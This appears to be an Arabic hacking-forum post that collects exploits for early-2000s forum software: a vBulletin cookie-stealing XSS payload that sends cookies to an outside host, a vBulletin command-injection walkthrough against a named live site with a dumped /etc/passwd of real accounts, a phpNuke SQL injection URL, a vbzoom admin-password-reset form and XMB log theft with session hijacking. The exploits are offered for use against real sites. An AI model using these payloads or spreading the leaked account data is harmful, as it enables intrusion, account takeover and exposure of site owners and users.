    if ( connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) == -1)
    {
    perror("connect()");
    exit(1);
    }
    alarm(0);
    }
    return 0;
    }
    -----------------------------------

    منقول من موقع أمريكي يالي بدو يترجو يحط ترجمتوا بالموضوع هذا
    ______________________________
    ثغرة
    vBulletin


    quote:
    --------------------------------------------------------------------------------

    Originally posted by MAKS:
    Within the first few lines of code in memberlist.php, the variable $letterbits
    is evaluated. Because of the way PHP initializes variables, we can inject HTML
    or JavaScript into the document. So by directing a user to, for example:

    http://vulnerable/forum/memberlist....E********='
    http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%


    2Ephp%3F****%3D%27%2B
    escape%28document%2E*****e%29%3C%2Fscript%3E
    (NOTE: The URL should be on a one line)

    You can steal the user's password hash and user id. Because of the way
    vBulletin parses URLs, the above will not function inside the forum, but if we
    put this in an off-site html file:
    <script>
    ******** = "http://www.vbulletin.com/forum/memb...t%3E********%3D
    %27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Freco


    rd%2Ephp%3F****%3D%27
    %2Bescape%28document%2E*****e%29%3C%2Fscript%3E"
    </script>
    And then link to it instead, the exploit will work as intended. The user
    doesn't even have to be aware of what has transpired, the above link will
    proceed first to the memberlist w/*****e stealing code, and then
    http://www.swgmotu.com./

    With the recorded user id and password hash, we can access the site:
    http://www.vbulletin.com/forum/index.php?bbuserid=[userid]&bbpassword=[password
    hash]
    -----------------------------------------------------------------------------------


    منقول من موقع امركي
    --------------------------------------------------------------------------------





    ثغرة في منتديات vbulletin 2.0.3

    بسم الله الرحمن الرحيم



    الثغرة وظيفتها ببساطة انها تسمحلك تنفذ اوامر على الجهاز زي البي اتش
    بي شيل


    فرحنا انا و صاحبي لاعز صديق للهكر الاخ قوقل و قلناله جبلنا مواقع
    شغالة على


    vbulletin 2.0.3

    طبعا ما قصر قوقل و جبلنا لسته فاخترنا وحدة منهم و كان الموقع هو

    http://www.romulus2.com/ <بعرف اني حاندم على اني حطيت الموقع بس يللا مو مشكلة>

    و طبقنا الثغرة ظهر الشكل

    http://www.romulus2.com/forum/calen...001-8-15&comma=";echo%20'';%20echo%20`<command>%20`;die
    ( );echo"

    و مكان <command>
    نحط الامر الي بدنا ياه

    فاول شي قلنا خلينا نعرف مين نحنا فحطينا

    whoami

    و الي طلع


    انا استبشرت خير على الاقل مني nobody

    فقلت خليني اخد نظرة على ملف الباسوورد و اشوف المواقع على السيرفر
    فحطيت


    cat /etc/passwd مكان <command>


    و طلع

    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:
    daemon:x:2:2:daemon:/sbin:
    adm:x:3:4:adm:/var/adm:
    lp:x:4:7:lp:/var/spool/lpd:
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    mail:x:8:12:mail:/var/spool/mail:
    news:x:9:13:news:/var/spool/news:
    uucp:x:10:14:uucp:/var/spool/uucp:
    operator:x:11:0perator:/root:
    games:x:12



















    games:/usr/games:
    gopher:x:13:30:gopher:/usr/lib/gopher-data:
    ftp:x:14:50:FTP User:/home/ftp:
    nobody:x:99:99:Nobody:/:
    gtd:x:501

    :/home/gtd:/bin/bash
    majordomo:x:504:103::/home/majordomo:/bin/bash
    quota25:*:505:1::/home/quota25:
    quota50:*:506:1::/home/quota50:
    quota75:*:507:1::/home/quota75:
    quota100:*:508:1::/home/quota100:
    quota150:*:509:1::/home/quota150:
    quota300:*:510:1::/home/quota300:
    quota2:*:511:1::/home/quota2:
    quota5:*:512:1::/home/quota5:
    quota10:*:513:1::/home/quota10:
    msql:x:497

    :/home/msql:/bin/bash
    userquota:x:503

    quota:/home/userquota:/bin/bash
    johnv:*:516:1::/home/johnv:
    minerva:x:514:516::/home/minerva:/bin/bash
    taosfineart:x:517:517::/home/taosfineart:/bin/bash
    technoasylum:x:518:518::/home/technoasylum:/bin/bash
    ward-tech:x:519:519::/home/ward-tech:/bin/bash
    malio:x:522:522::/home/malio:/bin/bash
    cindyland:x:529:529::/home/cindyland:/bin/bash
    mathom-house:x:532:532::/home/mathom-house:/bin/bash
    libertywebhosting:x:534:534::/home/libertywebhosting:/bin/bash
    bonfiglioreed:x:537:537::/home/bonfiglioreed:/bin/bash
    oldtymespizza:x:539:539::/home/oldtymespizza:/bin/bash
    dogshowjournal:x:546:545::/home/dogshowjournal:/bin/bash
    surfclassic:x:550:549::/home/surfclassic:/bin/bash
    thomason-development:x:552:551::/home/thomason-development:/bin/bash
    james:x:553:534::/home/james:/bin/emailonly
    alexr:x:554:534::/home/alexr:/bin/emailonly
    god:x:555:522::/home/god:/bin/emailonly
    sales:x:556:522::/home/sales:/bin/bash
    info:x:557:522::/home/info:/bin/emailonly
    ryugen:x:558:552::/home/ryugen:/bin/bash
    allanart:x:566:559::/home/allanart:/bin/bash
    womensphotoworks:x:573:564::/home/womensphotoworks:/bin/bash
    mbaentry:x:576:567::/home/mbaentry:/bin/bash
    omahasoaring:x:577:568::/home/omahasoaring:/bin/bash
    talvee:x:582:549::/home/talvee:/bin/emailonly
    mobilewashenvironmental:x:585:572::/home/mobilewashenvironmental:/bin/bash
    mobilewashservices:x:589:576::/home/mobilewashservices:/bin/bash
    ocdeaf:x:591:578::/home/ocdeaf:/bin/bash
    foxfire-goldens:x:592:579::/home/foxfire-goldens:/bin/bash
    finchair:x:594:580::/home/finchair:/bin/bash
    americanabatement:x:595:581::/home/americanabatement:/bin/bash
    whiskersgraphics:x:596:582::/home/whiskersgraphics:/bin/bash
    ronemous:x:604:568::/home/ronemous:/bin/emailonly
    parrotranch:x:605:588::/home/parrotranch:/bin/bash
    erlefamily:x:606:589::/home/erlefamily:/bin/ftponly
    parduhn:x:610:593::/home/parduhn:/bin/bash
    riptideproductions:x:616:596::/home/riptideproductions:/bin/bash
    kaialece:x:626:604::/home/kaialece:/bin/bash
    zeeksystems:x:627:605::/home/zeeksystems:/bin/bash
    trevor:x:630:596::/home/trevor:/bin/emailonly
    dino:x:631:522::/home/dino:/bin/emailonly
    loconsigo:x:632:608::/home/loconsigo:/bin/bash
    delamerevineyard:x:643:613::/home/delamerevineyard:/bin/bash
    michael:x:652:605::/home/michael:/bin/emailonly
    jereme:x:654:596::/home/jereme:/bin/emailonly
    windows-tips:x:655:624::/home/windows-tips:/bin/bash
    ghost-ride:x:657:626::/home/ghost-ride:/bin/bash
    cprltd:x:663:629::/home/cprltd:/bin/bash
    batmanandbarbie:x:673:636::/home/batmanandbarbie:/bin/bash
    housegroove:x:674:637::/home/housegroove:/bin/bash
    washglass:x:675:638::/home/washglass:/bin/bash
    djmattson:x:676:639::/home/djmattson:/bin/bash
    statecapitols:x:677:640::/home/statecapitols:/bin/bash
    kanjiweb:x:678:641::/home/kanjiweb:/bin/bash
    freevg:x:681:644::/home/freevg:/bin/bash
    writersresource:x:682:645::/home/writersresource:/bin/bash
    evilgraphics:x:684:647::/home/evilgraphics:/bin/bash
    magdalenhsuli:x:690:650::/home/magdalenhsuli:/bin/bash
    antioch:x:704:659::/home/antioch:/bin/bash
    lifelinks:x:705:660::/home/lifelinks:/bin/bash
    sinecos:x:707:662::/home/sinecos:/bin/bash
    dosdonas:x:711:666::/home/dosdonas:/bin/bash
    accuratelegalprocessingse:x:713:668::/home/accuratelegalprocessingse:/bin/bash
    jc:x:716:581::/home/jc:/bin/emailonly
    jo:x:717:581::/home/jo:/bin/emailonly
    infoaai:x:719:581::/home/infoaai:/bin/emailonly
    gypsytejas:x:721:671::/home/gypsytejas:/bin/bash
    j-j-c:x:724:674::/home/j-j-c:/bin/bash
    camp:x:726:660::/home/camp:/bin/emailonly
    marinabaypark:x:740:677::/home/marinabaypark:/bin/bash
    gypsy:x:741:671::/home/gypsy:/bin/emailonly
    meg:x:749:593::/home/meg:/bin/emailonly
    huwe:x:751:679::/home/huwe:/bin/bash
    ultimateautomotive50:x:753:681::/home/ultimateautomotive50:/bin/bash
    socceracademypa:x:755:683::/home/socceracademypa:/bin/bash
    phoenixfamilymuseum:x:761:689::/home/phoenixfamilymuseum:/bin/bash
    videoteacher:x:762:690::/home/videoteacher:/bin/bash
    spiffydesign:x:765:693::/home/spiffydesign:/bin/bash
    nawaf:x:766:694::/home/nawaf:/bin/bash
    ccdump:x:768:696::/home/ccdump:/bin/bash
    drwizard-atlanta:x:772:700::/home/drwizard-atlanta:/bin/bash
    showme-powerchutes:x:777:705::/home/showme-powerchutes:/bin/bash
    shellmandanceacademy:x:778:706::/home/shellmandanceacademy:/bin/bash
    samelec:x:779:707::/home/samelec:/bin/bash
    pet-odor:x:780:708::/home/pet-odor:/bin/bash
    michael1:x:781:593::/home/michael1:/bin/emailonly
    mmnursereview:x

    710::/home/mmnursereview:/bin/bash
    franksland:x:787:712::/home/franksland:/bin/bash
    gr8gifts4u:x:801:717::/home/gr8gifts4u:/bin/bash
    globalintercultural:x:806:718::/home/globalintercultural:/bin/bash
    gotcher-belote:x:807:719::/home/gotcher-belote:/bin/bash
    francisengineering:x:808:720::/home/francisengineering:/bin/bash
    befree2:x:814:726::/home/befree2:/bin/bash
    barclay:x:821:689::/home/barclay:/bin/emailonly
    airupdate:x:823:732::/home/airupdate:/bin/bash
    stream:x:825:734::/home/stream:/bin/bash
    strantech:x:826:735::/home/strantech:/bin/bash
    newcityftp:x:832:740::/home/newcityftp:/bin/bash
    nagomifan:x:833:741::/home/nagomifan:/bin/bash
    gecko:x:834:671::/home/gecko:/bin/emailonly
    chooseyourlife:x:838:745::/home/chooseyourlife:/bin/bash
    binarytech:x:839:746::/home/binarytech:/bin/bash
    <<<طبعا ملف الباس كله طويل لكن حطيته جزء منه مشان تشوفوه>>>>

    ممم سيرفر جيد و حطيت نسخة عنه في مكتبة ملفات الباسوورد عندي للذكرى
    المهم نشوف الموقع اشو حكايته


    romulus2:x:997:837::/home/romulus2:/bin/bash
    اووووه حركات يوصل ل /bin/bash

    االمهم فكرت كيف حناخد الباسوورد حق هدا الموقع
    صاحبي قلي شوف الشادو قلتلو لا تتعب نفسك الشادو هذي الايام مخفي ايام
    زماااااااااااااااان


    فقلت خلص نشوف الكونفيق و ان شاء الله يكون صاحب الموقع غبي و حط نفس
    الباس


    من ملف الباسوود لاحظت انه الملف هو

    /home/romulus2

    و في طريقة تانية انك تكتب pwd

    كتبت و طلع

    /home2/www/romulus2/forum

    اذا هذا هو مكان ملفات الموقع الصحيحة و اضفت لها

    /admin/config.php

    فصار الامر

    cat /home2/www/romulus2/forum/admin/config.php
    _________________
    -------------------------
    ثغرة مجلة
    phpnuke

    ثغرة مجلة
    phpnuke


    http://www.example.com/modules.php?...iewforum&forum='%20OR%201=1%20INTO%
    20OUTFILE%20'[/path]/vf.txt'/*



    تضع بدلا
    http://www.example.com/ أسم الموقع الذي تريده


    اختراق منتديات vbzoom
    ------------------------------------------------
    السلام عليكم
    شباب انا اقدم لكم اهم ثغره معى الشرح المفصل
    <form name="f1"
    action="http://www.victim.com/vbzoom/register.php"
    method="POST">
    <input type="hidden" name="ChangeProfile"
    value="1">
    User Name: <input type="text"
    name="UserName"><br>
    Password: <input type="text"
    name="Password"><br>
    Email: <input type="text" name="Email">
    <input type="hidden" name="HomePage"
    value="lamerZ">
    <input type="hidden" name="VBZooMForum*******UserName"
    value="false">
    <input type="hidden" name="VBZooMForum*******UserName"
    value="false">
    <input type="submit" value="reset password">
    </form


    <form name="f1" action="هنا تضع
    وصله الموقع

    " method="POST">
    <input type="hidden" name="ChangeProfile"
    value="1">
    User Name: <input type="text"
    name="UserName"><br>
    Password: <input type="text"
    name="Password"><br>
    Email: <input type="text" name="Email">
    <input type="hidden" name="HomePage"
    value="lamerZ">
    <input type="hidden" name="VBZooMForum*******UserName"
    value="false">
    <input type="hidden" name="VBZooMForum*******UserName"
    value="false">
    <input type="submit" value="reset password">
    </form
    وبعد ان تحط وصل الموقع
    تسويه في صفحه html
    وتكتب اسم الادمين والباسورد الجديده وايميل جديد
    تحياتي
    _________________


    ثغرة في منتديات من نوع XMB
    --------------------------------------------------------
    بسم الله الرحمن الرحيم
    طريقة الاختراق :

    ثغرة جديدة في منتديات من نوع XMB

    الشرح والتطبيق

    1- عليك بالذهاب الى موقع جو http://www.google.com/
    2- اكتب في منطقة البحث XMB 1.6 Magic Lantern Final
    3- سوف ترى منتديات كثييييييييره اكثرها مصابه بهذه الثغره لكن رجاااء
    لاتقرب المنتديات العربية وعليك بتحذيرها من الثغره الموجوده.
    4- اضغط على اي منتدى وقم بكتابة الكلمة التالية بعد عنوان المنتدى
    index_log.log يعني راح يكون زي كده
    http://www.******.com/massegboard/index_log.log
    5- راح ينزل عندك ملف والملف عباره عن ملف زي الكوكيز كبير وفيه اسماء
    المستخدمين والباسورد وأشياء ثانيه ماتهمنا.
    6- الأن عليك بالبحث في المنتدى عن اسم المدير وذلك بالذهاب الى المواضيع

    وتشوف الأسماء والي تلقى تحت اسمه ادمن ستريتور انسخ اسمه.
    7- افتح الملف الي نزلته من الموقع وسوي بحث عن اسم المدير راح يجيك هيك
    مثلا
    :
    xmbuser=admin
    والباسورد راح تلقاه قدامه زي كذه
    xmbpw=1faeb6747a31c854800ddf3c62b1717a
    8- طبعا الباسورد في هذه الحاله مشفر وفك التشفير صعب لهذا الغرض قامت
    شركة

    CCI بتصميم برنامج يقوم بهذا الغرض وهذه وصلت البرنامج
    ftp://www.cafecounterintelligence.com/cci/chigger.exe


    افتح البرنامج وفي :


    رقم (1) قم بوضع علامة صح.
    رقم (2) قم بوضع اسم العضو سواء مدير او غيره
    رقم (3) قم بوضع الباسورد المشفر حق العضو او المدير او غيره
    رقم (4) قم بوضع علامة صح.
    رقم (5) قم بوضع البروكسي الي تريده اوالبروكسي حق مزوده الخدمه حقك
    رقم (6) قم بوضع المنفذ حق البروكسي

    10- بقي شيء واحد بعد اتمام الأعدادات حقت البرنامج بقي ان تذهب الى
    المتصفح انترنت اكسبلورر > اضغط بالزر اليمين> الأتصالاات>
    اعدادات>

    قم بوضع البروكسي هذا 127.0.0.1> والمنفذ 8080
    11- بعد ذلك اذهب للمنتدى المستهدف وتجول فيه وكأنك المدير تبع المنتدى
    وسوي الي بدك ياه
    ها ها ها ها

    أرجو أن ينال هذا الدرس إعجابكم
    هذا الدرس هام جدا جدا جدا لكل الهاكرز بجميع مستوياتهم[/align]

    طرق اختراق المواقع 3696926579

      مواضيع مماثلة

      -

      الوقت/التاريخ الآن هو الإثنين نوفمبر 25, 2024 2:49 am